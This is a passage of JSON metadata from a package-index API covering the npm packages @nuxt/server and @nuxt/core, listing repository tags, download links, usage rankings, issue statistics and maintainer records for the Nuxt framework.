t/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:06.637Z","dependent_packages_count":9,"downloads":576129,"downloads_period":"last-month","dependent_repos_count":56773,"rankings":{"downloads":0.24511252460298408,"dependent_repos_count":0.12629555175806825,"dependent_packages_count":2.250904144690052,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.4437801426250028,"average":0.6234410936728578},"purl":"pkg:npm/%40nuxt/server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/server","docker_dependents_count":259,"docker_downloads_count":1376808,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/server/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:31.703Z","updated_at":"2022-11-20T01:59:31.703Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:31.671Z","updated_at":"2022-11-20T01:59:31.671Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:31.694Z","updated_at":"2022-11-20T01:59:31.694Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:31.720Z","updated_at":"2022-11-20T01:59:31.720Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:08.703Z","updated_at":"2023-08-19T18:27:08.703Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096088,"name":"@nuxt/core","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:16:35.204Z","latest_release_published_at":"2024-06-28T11:34:24.055Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T18:01:28.951Z","created_at":"2022-04-08T10:39:22.944Z","updated_at":"2026-05-11T18:01:28.951Z","registry_url":"https://www.npmjs.com/package/@nuxt/core","install_command":"npm install @nuxt/core","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221370872,"owners_count":16806934,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/